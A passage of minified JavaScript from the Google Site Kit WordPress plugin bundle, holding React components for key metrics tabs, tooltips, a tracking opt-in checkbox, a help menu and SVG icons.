0"}),a.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_2200_11981"}),a.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_2200_11981",result:"shape"})))));var ee=i(83880);function TabContent({activeMetricItems:e,newlyDetectedMetrics:t,savedItemSlugs:i}){return(0,j.jsxs)("div",{className:"googlesitekit-chip-tab-group__tab-item",children:[Object.keys(e).map(a=>{const s=e[a].group,o=t?.[s]?.includes(a);return(0,j.jsx)(MetricItem,{slug:a,savedItemSlugs:i,isNewlyDetected:o,...e[a]},a)}),!Object.keys(e).length&&(0,j.jsxs)("div",{className:"googlesitekit-chip-tab-group__graphic",children:[(0,j.jsx)(key_metrics_no_selected_items,{height:250}),(0,j.jsx)(ee.A,{children:(0,X.__)("No metrics were selected yet","google-site-kit")})]})]})}TabContent.propTypes={activeMetricItems:A().object.isRequired,newlyDetectedMetrics:A().object.isRequired,savedItemSlugs:A().array};const te=Object.freeze([]);function ChipTabGroup({allMetricItems:e,savedItemSlugs:t}){const i=(0,a.useRef)(),[y,A]=(0,a.useState)(n.QJ.SLUG),[M,N]=(0,a.useState)(0),f=(0,m.dv)()===m.mp,T=(0,p.A)(n.Is,n.Y0),S=(0,p.A)(n.Is,n.Nl)||te,k=(0,p.A)(n.Is,n.NO)||te,v=(0,o.useSelect)(e=>e(g.oR).isUserInputCompleted()),b=(0,o.useSelect)(e=>{const t=e(g.oR).getUserPickedMetrics();if(t?.length){const i=e(l.K9).getKeyMetricsConversionEventWidgets();return Object.keys(i).filter(e=>t.some(t=>i[e].includes(t)))}const i=e(g.oR).getUserInputSettings();return i?.includeConversionEvents?.values}),_=(0,o.useSelect)(e=>e(u.i).isModuleConnected(c.L1)),x=(0,o.useSelect)(e=>_?e(l.K9).getDetectedEvents():[]),C=(0,o.useSelect)(e=>e(g.oR).getAnswerBasedMetrics(null,[...b||[],...x||[]])),{keyMetricsGroups:D,dynamicGroups:E}=function({detectedEvents:e=[],currentlyActiveEvents:t=[],isUserInputCompleted:i,answerBasedMetrics:s=[]}){const o=[l.nc.SUBMIT_LEAD_FORM,l.nc.CONTACT,l.nc.GENERATE_LEAD].filter(i=>e?.includes(i)||t?.includes(i)),r=[l.nc.ADD_TO_CART,l.nc.PURCHASE].filter(i=>e?.includes(i)||t?.includes(i)),c=(0,a.useMemo)(()=>[n.IX,n.wb,...o?.length?[n.XU]:[],...r?.length?[n.GF]:[],n.hs],[o,r]),d=(0,a.useMemo)(()=>i&&s?.length?[n.QJ,n.KD]:[n.QJ],[i,s]);return{hasGeneratingLeadsGroup:o,hasSellingProductsGroup:r,keyMetricsGroups:c,dynamicGroups:d}}({detectedEvents:x,currentlyActiveEvents:b,isUserInputCompleted:v,answerBasedMetrics:C}),w=(0,a.useMemo)(()=>[...E,...D],[E,D]),Z=(0,o.useSelect)(e=>{if(!e(u.i).isModuleConnected(c.L1))return[];const t=e(l.K9).getDetectedEvents(),i=e(l.K9).getNewBadgeEvents();if(t?.length&&i?.length){const e=t.filter(e=>l.fV.includes(e)),a=i.filter(e=>l.fV.includes(e)),s=i.filter(e=>!l.fV.includes(e));if(e?.length>1&&a.length>0)return s}return i}),R=(0,o.useSelect)(e=>_?e(l.K9).getKeyMetricsConversionEventWidgets():[]),{selectedCounts:L,activeMetricItems:G,newlyDetectedMetrics:z}=function({allMetricItems:e={},isActive:t,effectiveSelection:i=[],answerBasedMetrics:s=[],selectedMetrics:o=[],newBadgeEvents:r=[],conversionReportingEventWidgets:l={}}){return(0,a.useMemo)(()=>{const a={[n.QJ.SLUG]:0},c={},d={};for(const u in e){const m=e[u].group;if((m===t||t===n.QJ.SLUG&&i.includes(u))&&(c[u]=e[u]),t===n.KD.SLUG&&s.includes(u)&&s.includes(u)&&(c[u]=e[u]),!a[m]){const t=Object.keys(e).filter(t=>!(e[t].group!==m||!o?.includes(t))).length;a[m]=t}var g;if(r?.length)r.some(e=>l[e].includes(u))&&(d[m]=[...null!==(g=d[m])&&void 0!==g?g:[],u])}return{selectedCounts:a,activeMetricItems:c,newlyDetectedMetrics:d}},[e,t,i,s,o,r,l])}({allMetricItems:e,isActive:y,effectiveSelection:S,answerBasedMetrics:C,selectedMetrics:T,newBadgeEvents:Z,conversionReportingEventWidgets:R}),{setValues:O}=(0,o.useDispatch)(r.s),P=(0,a.useCallback)(()=>{O(n.Is,{[n.Y0]:T,[n.Nl]:[...S,...k],[n.NO]:[]})},[T,S,k,O]),B=(0,a.useCallback)((e,t)=>{if(e)A(e);else{const e=w[t];N(t),A(e.SLUG)}k.length&&P()},[w,k,A,P]),U=(0,o.useSelect)(e=>e(d.n).getValue(n.EA)),W=(0,s.A)(U),H=Object.keys(z);(0,a.useEffect)(()=>{if(!W&&U)if(A(n.QJ.SLUG),N(0),H.length&&f){const e=w.find(e=>e.SLUG===H[0]);N(w.indexOf(e)),A(e.SLUG)}else N(0),A(n.QJ.SLUG);W&&!U&&P()},[U,W,k,w,f,H,P]),function({containerRef:e,isMobileBreakpoint:t,isSelectionPanelOpen:i,isSelectionPanelOpenPrevious:s}){const o=(0,a.useCallback)(()=>{const i=e.current?.querySelector(".mdc-tab-scroller__scroll-content");if(!t)return;const a=e.current?.querySelectorAll(".googlesitekit-chip-tab-group__tab-items .mdc-tab");if(!a?.length||!i)return;const s=e.current?.getBoundingClientRect(),n=[];a.forEach((e,t)=>{const i=e.getBoundingClientRect();i.left>=s.left&&i.right<=s.right&&n.push(t)});const r=a[n.length];if(!r)return;const l=r.getBoundingClientRect();(l.left>=s.right||l.left-s.right<0&&-(l.left-s.right)<=20)&&("2px"===i.style.columnGap?i.style.columnGap="20px":i.style.columnGap="2px",o())},[e,t]),n=(0,h.d)(o,50);(0,I.A)("resize",n),(0,a.useEffect)(()=>{!s&&i&&o()},[i,s,o])}({containerRef:i,isMobileBreakpoint:f,isSelectionPanelOpen:U,isSelectionPanelOpenPrevious:W});const V=[[...E,...D.slice(0,2)],[...D.slice(2)]];return(0,j.jsxs)("div",{className:"googlesitekit-chip-tab-group",children:[(0,j.jsx)(TabItems,{containerRef:i,isMobileBreakpoint:f,chipItemRows:V,allGroups:w,isActive:y,onChipChange:B,selectedCounts:L,newlyDetectedMetrics:z,activeGroupIndex:M}),(0,j.jsx)(TabContent,{activeMetricItems:G,newlyDetectedMetrics:z,savedItemSlugs:t})]})}},12813:(e,t,i)=>{"use strict";i.d(t,{A:()=>m});var a=i(63696),s=i(50539),o=i(88273),n=i(7972),r=i(97345),l=i(7144),c=i(80),d=i(22942),g=i(49481),u=i(32803);function m(){const{setValue:e}=(0,s.useDispatch)(n.n),t=(0,s.useSelect)(e=>e(n.n).getValue("hasKeyMetricsSetupCTAWidgetAppeared")),i=(0,s.useSelect)(e=>{const t=e(r.oR).isItemDismissed(l.Uf),i=e(r.oR).isDismissingItem(l.Uf),a=p(e,u.Y,g.n),s=p(e,d.L1,c.K9);return!1===t&&!1===i&&a&&s},[]);return(0,a.useEffect)(()=>{t||!0!==i||e("hasKeyMetricsSetupCTAWidgetAppeared",!0)},[t,e,i]),t||!t&&i}function p(e,t,i){if(e(o.i).isModuleConnected(t)){const{isGatheringData:t,isDataAvailableOnLoad:a}=e(i);return t(),a()}return!1}},12896:(e,t,i)=>{"use strict";i.d(t,{l:()=>s});var a=i(78174);function s(e,t,i){(0,a.A)(i=>e.includes(i.keyCode)&&t.current.contains(i.target),i)}},13113:(e,t,i)=>{"use strict";i.d(t,{A:()=>d,v:()=>c});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(82871),l=i(62540);const c={DEFAULT:"default",OVERLAY:"overlay",SMALL:"small",SMALL_OVERLAY:"small-overlay",LARGE:"large"};function GatheringDataNotice({style:e}){return(0,l.jsx)("div",{className:n()("googlesitekit-gathering-data-notice",{[`googlesitekit-gathering-data-notice--has-style-${e}`]:!!e}),children:(0,l.jsx)("span",{children:(0,r.__)("Gathering data…","google-site-kit")})})}GatheringDataNotice.propTypes={style:s().oneOf(Object.values(c))};const d=GatheringDataNotice},13137:(e,t,i)=>{"use strict";i.d(t,{G:()=>c,HY:()=>g,SG:()=>d,db:()=>s,e4:()=>m,vl:()=>u});i(17243);var a=i(82871);const s="missing_required_scopes",o="insufficientPermissions",n="forbidden",r="internal_server_error",l="invalid_json";function c(e){return e?.code===s}function d(e){return[o,n].includes(e?.data?.reason)}function g(e){return!!e?.data?.reconnectURL}function u(e,t){return!(!t?.storeName||d(e)||c(e)||g(e))}function m(e){return e?.code===r?(0,a.__)("There was a critical error on this website while fetching data","google-site-kit"):e?.code===l?(0,a.__)("The server provided an invalid response","google-site-kit"):e?.message}},13620:e=>{"use strict";e.exports=googlesitekit.modules},14307:(e,t,i)=>{"use strict";i.d(t,{A:()=>AccessibleWarningIcon});var a=i(62688),s=i.n(a),o=i(63696),n=i(82871),r=i(55989),l=i(3170),c=i(62540);function AccessibleWarningIcon({height:e=12,screenReaderText:t=(0,n.__)("Error","google-site-kit"),width:i=14}){return(0,c.jsxs)(o.Fragment,{children:[(0,c.jsx)(r.A,{children:t}),(0,c.jsx)(l.A,{width:i,height:e})]})}AccessibleWarningIcon.propTypes={height:s().number,screenReaderText:s().string,width:s().number}},14578:(e,t,i)=>{"use strict";i.d(t,{A:()=>c});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(4751),l=i(62540);function PreviewTable({rows:e,rowHeight:t,padding:i}){const a=[];for(let i=0;e>i;i++)a.push((0,l.jsx)("div",{className:"googlesitekit-preview-table__row",children:(0,l.jsx)(r.A,{width:"100%",height:t+"px"})},"table-row-"+i));return(0,l.jsx)("div",{className:n()("googlesitekit-preview-table",{"googlesitekit-preview-table--padding":i}),children:a})}PreviewTable.propTypes={rows:s().number,rowHeight:s().number,padding:s().bool},PreviewTable.defaultProps={rows:11,rowHeight:35,padding:!1};const c=PreviewTable},15345:(e,t,i)=>{"use strict";i.d(t,{A:()=>ConnectModuleCTATile});var a=i(62688),s=i.n(a),o=i(82871),n=i(63696),r=i(50539),l=i(88273),c=i(4169),d=i(69908),g=i(65929),u=i(38432),m=i(4751),p=i(91013),I=i(62540);const h=(0,n.lazy)(()=>i.e(909).then(i.bind(i,4290)));function GhostCardGreenSVG(){return(0,I.jsx)(n.Suspense,{fallback:(0,I.jsx)(m.A,{width:"100%",height:"90px"}),children:(0,I.jsx)(p.A,{errorMessage:(0,o.__)("Failed to load graphic","google-site-kit"),children:(0,I.jsx)(h,{})})})}const y=(0,n.lazy)(()=>i.e(146).then(i.bind(i,6146)));function GhostCardRedSVG(){return(0,I.jsx)(n.Suspense,{fallback:(0,I.jsx)(m.A,{width:"100%",height:"90px"}),children:(0,I.jsx)(p.A,{errorMessage:(0,o.__)("Failed to load graphic","google-site-kit"),children:(0,I.jsx)(y,{})})})}var A=i(25064),M=i(50454);function ConnectModuleCTATile({moduleSlug:e}){const t=(0,g.A)(e),i=(0,r.useSelect)(t=>t(l.i).getModule(e)),a=(0,r.useSelect)(t=>t(l.i).getModuleIcon(e)),s=(0,r.useSelect)(e=>e(c.aO).getWidgets(d.AREA_MAIN_DASHBOARD_KEY_METRICS_PRIMARY)||[]).filter(t=>t.modules.includes(e)),m=M.G[s[0]?.slug],p=s.length>1;return i?(0,I.jsxs)("div",{className:`googlesitekit-widget--connectModuleCTATile googlesitekit-km-widget-tile ${p&&" googlesitekit-km-widget-tile--combined"}`,children:[!p&&(0,I.jsx)(A.A,{title:m?.title,infoTooltip:m?.description,loading:!1}),(0,I.jsx)("div",{className:"googlesitekit-km-widget-tile__body",children:(0,I.jsxs)("div",{className:"googlesitekit-km-connect-module-cta-tile",children:[a&&(0,I.jsx)("div",{className:"googlesitekit-km-connect-module-cta-tile__icon",children:(0,I.jsx)(a,{width:"32",height:"32"})}),(0,I.jsxs)("div",{className:"googlesitekit-km-connect-module-cta-tile__content",children:[(0,I.jsx)("p",{className:"googlesitekit-km-connect-module-cta-tile__text",children:p?(0,o.sprintf)(/* translators: %s: module name */ /* translators: %s: module name */ (0,o.__)("%s is disconnected, some of your metrics can’t be displayed","google-site-kit"),i.name):(0,o.sprintf)(/* translators: %s: module name */ /* translators: %s: module name */ (0,o.__)("%s is disconnected, metric can’t be displayed","google-site-kit"),i.name)}),(0,I.jsx)(u.A,{onClick:t,secondary:!0,children:(0,o.sprintf)(/* translators: %s: module name */ /* translators: %s: module name */ (0,o.__)("Connect %s","google-site-kit"),i.name)})]})]})}),p&&(0,I.jsxs)(n.Fragment,{children:[(0,I.jsx)("div",{className:"googlesitekit-km-connect-module-cta-tile__ghost-card",children:(0,I.jsx)(GhostCardGreenSVG,{})}),(0,I.jsx)("div",{className:"googlesitekit-km-connect-module-cta-tile__ghost-card",children:(0,I.jsx)(GhostCardGreenSVG,{})}),(0,I.jsx)("div",{className:"googlesitekit-km-connect-module-cta-tile__ghost-card",children:(0,I.jsx)(GhostCardRedSVG,{})})]})]}):null}ConnectModuleCTATile.propTypes={moduleSlug:s().string.isRequired}},17443:(e,t,i)=>{"use strict";i.d(t,{r:()=>AdminScreenTooltip,i:()=>a.i});var a=i(52274),s=i(63696),o=i(50539),n=i(62688),r=i(36703),l=i(40960),c=i(83202),d=i(94656),g=i(71264),u=i(97513),m=i(62540);function JoyrideTooltip(e){const{title:t,content:a,dismissLabel:o,disableOverlay:n=!0,target:p,cta:I=!1,className:h,styles:y={},slug:A="",placement:M="auto",onDismiss:N=()=>{},onView:f=()=>{},onTourStart:T=()=>{},onTourEnd:S=()=>{}}=e;function k(){return!!i.g.document.querySelector(p)}const[j,v]=(0,s.useState)(k),b=(0,u.dv)(),_=b===u.mp||b===u.Lg,[x,C]=(0,s.useState)(!0),D=(0,s.useRef)(_);if((0,l.A)(()=>{k()&&v(!0)},j?null:250),(0,s.useEffect)(()=>{let e=()=>{};if("function"==typeof i.g.ResizeObserver){const t=i.g.document.querySelector(p);if(t){const a=new ResizeObserver(()=>{i.g.dispatchEvent(new Event("resize"))});a.observe(t),e=()=>a.disconnect()}}return e},[p,j]),(0,s.useEffect)(()=>{let e;return D.current!==_&&(C(!1),e=setTimeout(()=>{C(!0)},50),D.current=_),()=>{e&&clearTimeout(e)}},[_]),!j)return null;const E=[{title:t,target:p,content:a,disableBeacon:!0,isFixed:!0,placement:M,cta:I,className:h}],w={close:o,last:o};return(0,m.jsx)(d.A,{slug:A,children:(0,m.jsx)(r.Ay,{callback:function({type:e}){switch(e){case r.qY.TOUR_START:T(),i.g.document.body.classList.add("googlesitekit-showing-tooltip");break;case r.qY.TOUR_END:S(),i.g.document.body.classList.remove("googlesitekit-showing-tooltip");break;case r.qY.STEP_AFTER:N();break;case r.qY.TOOLTIP:f()}},disableOverlay:n,spotlightPadding:0,floaterProps:g.ei,locale:w,steps:E,styles:{...g.R0,...y,options:{...g.R0.options,...y?.options},spotlight:{...g.R0.spotlight,...y?.spotlight}},tooltipComponent:c.A,run:x,disableScrolling:!0})})}JoyrideTooltip.propTypes={title:n.PropTypes.node,content:n.PropTypes.string,disableOverlay:n.PropTypes.bool,dismissLabel:n.PropTypes.string,target:n.PropTypes.string.isRequired,onDismiss:n.PropTypes.func,onShow:n.PropTypes.func,className:n.PropTypes.string,styles:n.PropTypes.object,slug:n.PropTypes.string,placement:n.PropTypes.string,onView:n.PropTypes.func};var p=i(7972),I=i(6109),h=i(62659);function AdminScreenTooltip(){const e=(0,h.A)(),{setValue:t}=(0,o.useDispatch)(p.n),i=(0,u.dv)(),{isTooltipVisible:a=!1,target:n,placement:r,className:l,tooltipSlug:c,title:d,content:g,dismissLabel:y}=(0,o.useSelect)(e=>e(p.n).getValue("admin-screen-tooltip")||{isTooltipVisible:!1});const A=(0,s.useCallback)(()=>{c&&(0,I.sx)(`${e}_${c}`,"tooltip_dismiss"),t("admin-screen-tooltip",void 0)},[t,c,e]);if(!a)return null;const M=i===u.mp||i===u.Lg,N=null!=n?n:'#adminmenu [href*="page=googlesitekit-settings"]',f=null!=r?r:"right";return(0,m.jsx)(JoyrideTooltip,{target:M?"body":N,placement:M?"center":f,className:M?"googlesitekit-tour-tooltip__modal_step":l||(n?void 0:"googlesitekit-tour-tooltip__fixed-settings-tooltip"),disableOverlay:!M,slug:"admin-screen-tooltip",title:d,content:g,dismissLabel:y,onView:function(){(0,I.sx)(`${e}_${c}`,"tooltip_view")},onDismiss:A})}},17534:(e,t,i)=>{"use strict";i.d(t,{A:()=>OptIn});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(63696),l=i(13606),c=i(82871),d=i(50539),g=i(49383),u=i(97345),m=i(65054),p=i(38432),I=i(62659),h=i(7076),y=i(62540);function OptIn({id:e="googlesitekit-opt-in",name:t="optIn",className:i,trackEventCategory:a,trackEventAction:s="tracking_optin",alignLeftCheckbox:o=!1}){const[A,M]=(0,r.useState)(),N=(0,d.useSelect)(e=>e(u.oR).isTrackingEnabled()),f=(0,d.useSelect)(e=>e(u.oR).getErrorForAction("setTrackingEnabled",[!N])),{setTrackingEnabled:T}=(0,d.useDispatch)(u.oR),S=(0,I.A)(),k=(0,r.useCallback)(async e=>{const{response:t,error:i}=await T(e);i?M(N):((0,m.M9)(t.enabled),t.enabled&&(0,m.sx)(a||S,s))},[N,T,a,s,S]);(0,r.useEffect)(()=>{void 0!==N&&void 0===A&&M(N)},[N,A]);const j=(0,h.d)(k,300),v=(0,r.useCallback)(e=>{const t=e.target.checked;M(t),j(t)},[j]);return(0,y.jsxs)("div",{className:n()("googlesitekit-opt-in",i),children:[(0,y.jsx)(g.Checkbox,{id:e,name:t,value:"1",checked:A,onChange:v,loading:void 0===N,alignLeft:o,children:(0,l.A)((0,c.__)("<span>Help us improve Site Kit by sharing anonymous usage data.</span> <span>All collected data is treated in accordance with the <a>Google Privacy Policy</a></span>","google-site-kit"),{a:(0,y.jsx)(p.A,{href:"https://policies.google.com/privacy",external:!0},"link"),span:(0,y.jsx)("span",{})})}),f?.message&&(0,y.jsx)("div",{className:"googlesitekit-error-text",children:f?.message})]})}OptIn.propTypes={id:s().string,name:s().string,className:s().string,trackEventCategory:s().string,alignLeftCheckbox:s().bool}},18418:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 2 12"},e),a||(a=s.createElement("g",{fill:"currentColor",fillRule:"evenodd"},s.createElement("path",{d:"M0 0h2v7H0zM0 10h2v2H0z"}))))},19790:(e,t,i)=>{"use strict";i.d(t,{A:()=>HelpMenu});var a,s=i(62688),o=i.n(s),n=i(21795),r=i(63696),l=i(19266),c=i(82871),d=i(50539),g=i(49383);function u(){return u=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},u.apply(null,arguments)}const m=e=>r.createElement("svg",u({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 20 20"},e),a||(a=r.createElement("path",{fill:"currentColor",d:"M9 16h2v-2H9zm1-16C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0m0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8m0-14C7.79 4 6 5.79 6 8h2c0-1.1.9-2 2-2s2 .9 2 2c0 2-3 1.75-3 5h2c0-2.25 3-2.5 3-5 0-2.21-1.79-4-4-4"})));var p=i(12896),I=i(6109),h=i(38432),y=i(62659),A=i(62540);function HelpMenuLink({children:e,href:t,gaEventLabel:i,onClick:a,icon:s}){const o=(0,y.A)(),n=(0,r.useCallback)(async()=>{a?.(),i&&await(0,I.sx)(`${o}_headerbar_helpmenu`,"click_outgoing_link",i)},[a,i,o]);return(0,A.jsx)("li",{className:"googlesitekit-help-menu-link mdc-list-item",role:"none",children:(0,A.jsx)(h.A,{className:"mdc-list-item__text",href:t,role:"menuitem",onClick:n,leadingIcon:s,external:!0,hideExternalIndicator:!0,children:e})})}HelpMenuLink.propTypes={children:o().node.isRequired,href:o().string,gaEventLabel:o().string,onClick:o().func};const M=HelpMenuLink;var N,f,T=i(88273),S=i(30805),k=i(29785),j=i(58718);function v(){return v=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},v.apply(null,arguments)}const b=e=>r.createElement("svg",v({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),N||(N=r.createElement("path",{stroke:"#6C726E",strokeWidth:1.5,d:"M5 5.75h14c.69 0 1.25.56 1.25 1.25v9.161c0 .69-.56 1.25-1.25 1.25H6.633l-.219.213-2.664 2.597V7c0-.69.56-1.25 1.25-1.25Z"})),f||(f=r.createElement("path",{fill:"#6C726E",d:"M11.5 8.5H13v4h-1.5zM11.5 13.5H13V15h-1.5z"})));var _,x,C;function D(){return D=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},D.apply(null,arguments)}const E=e=>r.createElement("svg",D({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),_||(_=r.createElement("circle",{cx:12,cy:11,r:8.25,stroke:"#6C726E",strokeWidth:1.5})),x||(x=r.createElement("path",{fill:"#6C726E",d:"m10 9 7-3-2.953 7.047L7 16z"})),C||(C=r.createElement("circle",{cx:12,cy:11,r:1,fill:"#fff"})));var w,Z,R;function L(){return L=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},L.apply(null,arguments)}const G=e=>r.createElement("svg",L({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),w||(w=r.createElement("mask",{id:"support_svg__a",fill:"#fff"},r.createElement("path",{d:"M12 2a9 9 0 0 1 2.128 17.745C10.508 21.823 5 23 5 23c.023-.017 2.69-2.024 3.053-3.911A9 9 0 0 1 3 11a9 9 0 0 1 9-9"}))),Z||(Z=r.createElement("path",{fill:"#6C726E",d:"M12 2V.5zm9.001 9h1.5zm-2.25 5.953 1.125.993zm-1.802 1.566.826 1.252zm-2.3 1.086.441 1.433zm-.521.14-.354-1.458-.207.05-.186.107zM5 23l-.901-1.2-5.441 4.089 6.655-1.422zm3.053-3.911 1.473.284.217-1.128-1.031-.504zm-1.001-.57-.826 1.252zm-1.704-1.457-1.109 1.01zM3 11H1.5zm9-9v1.5a7.5 7.5 0 0 1 7.501 7.5h3C22.501 5.2 17.799.5 12 .5zm9.001 9h-1.5a7.47 7.47 0 0 1-1.875 4.96l1.125.993 1.125.993A10.47 10.47 0 0 0 22.5 11zm-2.25 5.953-1.125-.992a7.6 7.6 0 0 1-1.503 1.305l.826 1.253.826 1.252a10.6 10.6 0 0 0 2.1-1.825zm-1.802 1.566-.826-1.253a7.5 7.5 0 0 1-1.915.905l.441 1.434.441 1.433a10.5 10.5 0 0 0 2.685-1.267zm-2.3 1.086-.44-1.434c-.131.04-.273.077-.434.116l.353 1.458.353 1.458c.19-.046.397-.1.61-.165zm-.521.14-.747-1.3c-1.661.953-3.814 1.728-5.609 2.271a47 47 0 0 1-2.864.767l-.17.039-.04.009-.01.002h-.002L5 23l.314 1.467h.002l.004-.002.015-.003.052-.011.193-.044a49.75 49.75 0 0 0 3.062-.82c1.864-.564 4.275-1.417 6.233-2.541zM5 23l.901 1.2c.041-.032.783-.592 1.576-1.412.735-.76 1.777-2.007 2.049-3.415l-1.473-.284-1.473-.284c-.092.478-.564 1.178-1.26 1.898-.637.659-1.239 1.111-1.221 1.098zm3.053-3.911.659-1.348q-.438-.213-.834-.475l-.826 1.253-.826 1.252q.565.37 1.168.665zm-1.001-.57.826-1.253c-.523-.344-1.001-.753-1.422-1.215l-1.108 1.01-1.109 1.011a10.5 10.5 0 0 0 1.987 1.699zm-1.704-1.457 1.108-1.011A7.47 7.47 0 0 1 4.5 11h-3c0 2.723 1.039 5.207 2.74 7.072zM3 11h1.5A7.5 7.5 0 0 1 12 3.5v-3C6.2.5 1.5 5.2 1.5 11z",mask:"url(#support_svg__a)"})),R||(R=r.createElement("path",{fill:"#6C726E",d:"M11.796 16q.487 0 .818-.312.332-.31.332-.767 0-.456-.332-.767a1.15 1.15 0 0 0-.818-.312q-.486 0-.817.312a1 1 0 0 0-.332.768q0 .457.332.766.33.312.817.312m.11-8.527q.62 0 1.006.311.387.312.387.788 0 .333-.243.706-.243.374-.685.726-.707.58-1.028 1.069-.32.486-.32.965 0 .31.221.518a.8.8 0 0 0 .574.208q.333 0 .586-.208a.9.9 0 0 0 .32-.56q.066-.332.299-.633.231-.3.762-.778.707-.622.961-1.11T15 8.407q0-1.08-.839-1.743Q13.321 6 11.951 6q-.928 0-1.624.343-.696.342-1.204 1.026a.53.53 0 0 0-.1.498q.078.27.32.456a.8.8 0 0 0 .652.136q.365-.073.608-.385.243-.29.564-.445t.74-.156"})));var z,O,P;function B(){return B=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},B.apply(null,arguments)}const U=e=>r.createElement("svg",B({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),z||(z=r.createElement("path",{stroke:"#6C726E",strokeWidth:1.5,d:"M19 8v11a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h7z"})),O||(O=r.createElement("path",{fill:"#6C726E",d:"M13.5 9V3L19 9z"})),P||(P=r.createElement("path",{stroke:"#6C726E",strokeWidth:1.5,d:"M8.5 11.5h7M8.5 14.5h7M8.5 17.5H13"})));var W=i(4452),H=i.n(W);function HelpMenu({children:e}){const[t,i]=(0,r.useState)(!1),a=(0,r.useRef)(),s=(0,y.A)(),o=(0,S.i)("setupFlowRefresh");(0,n.A)(a,()=>i(!1)),(0,p.l)([l._f,l.wn],a,()=>i(!1));const u=(0,d.useSelect)(e=>e(T.i).isModuleActive(j.Py)),h=(0,r.useCallback)(()=>{t||(0,I.sx)(`${s}_headerbar`,"open_helpmenu"),i(!t)},[t,s]),N=(0,r.useCallback)(()=>{i(!1)},[]),f=[{gaEventLabel:"fix_common_issues",href:(0,d.useSelect)(e=>e(k.O4).getDocumentationLinkURL("fix-common-issues")),children:(0,c.__)("Fix common issues","google-site-kit")},{gaEventLabel:"documentation",href:"https://sitekit.withgoogle.com/documentation/",children:(0,c.__)("Read help docs","google-site-kit")},{gaEventLabel:"support_forum",href:"https://wordpress.org/support/plugin/google-site-kit/",children:(0,c.__)("Get support","google-site-kit")},...u?[{gaEventLabel:"adsense_help",href:"https://support.google.com/adsense/",children:(0,c.__)("Get help with AdSense","google-site-kit")}]:[]],v=[{href:"https://sitekit.withgoogle.com/documentation/",icon:(0,A.jsx)(U,{width:24,height:24}),children:(0,c.__)("Browse documentation","google-site-kit")},{href:"https://wordpress.org/support/plugin/google-site-kit/",icon:(0,A.jsx)(G,{width:24,height:24}),children:(0,c.__)("Get free support","google-site-kit")},{onClick:()=>{},icon:(0,A.jsx)(E,{width:24,height:24}),children:(0,c.__)("Start a feature tour","google-site-kit")},{href:"https://wordpress.org/support/plugin/google-site-kit/reviews/",icon:(0,A.jsx)(b,{width:24,height:24}),children:(0,c.__)("Send feedback","google-site-kit")}];return(0,A.jsxs)("div",{ref:a,className:"googlesitekit-dropdown-menu googlesitekit-dropdown-menu__icon-menu mdc-menu-surface--anchor",children:[(0,A.jsx)(g.Button,{"aria-controls":"googlesitekit-help-menu","aria-expanded":t,"aria-label":(0,c.__)("Help","google-site-kit"),"aria-haspopup":"menu",className:"googlesitekit-header__dropdown googlesitekit-border-radius-round googlesitekit-button-icon googlesitekit-help-menu__button mdc-button--dropdown",icon:(0,A.jsx)(m,{width:"20",height:"20"}),onClick:h,tooltipEnterDelayInMS:500,text:!0}),(0,A.jsxs)(g.Menu,{className:H()("googlesitekit-width-auto",{"googlesitekit-help-menu":o}),menuOpen:t,id:"googlesitekit-help-menu",onSelected:N,children:[e,(o?v:f).map((e,t)=>(0,A.jsx)(M,{...e},t))]})]})}HelpMenu.propTypes={children:o().node}},19793:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),a||(a=s.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M12 1C5.925 1 1 5.925 1 12s4.925 11 11 11 11-4.925 11-11S18.075 1 12 1m4.806 8.592.592-.806-1.612-1.184-.592.806-3.89 5.296c-.166.226-.36.296-.512.296s-.346-.07-.512-.296l-1.474-2.007-.592-.806-1.612 1.184.592.806 1.474 2.007C9.191 15.6 9.971 16 10.792 16s1.6-.4 2.124-1.112z",clipRule:"evenodd"})))},19826:(e,t,i)=>{"use strict";i.d(t,{Ay:()=>n,Kq:()=>o});const 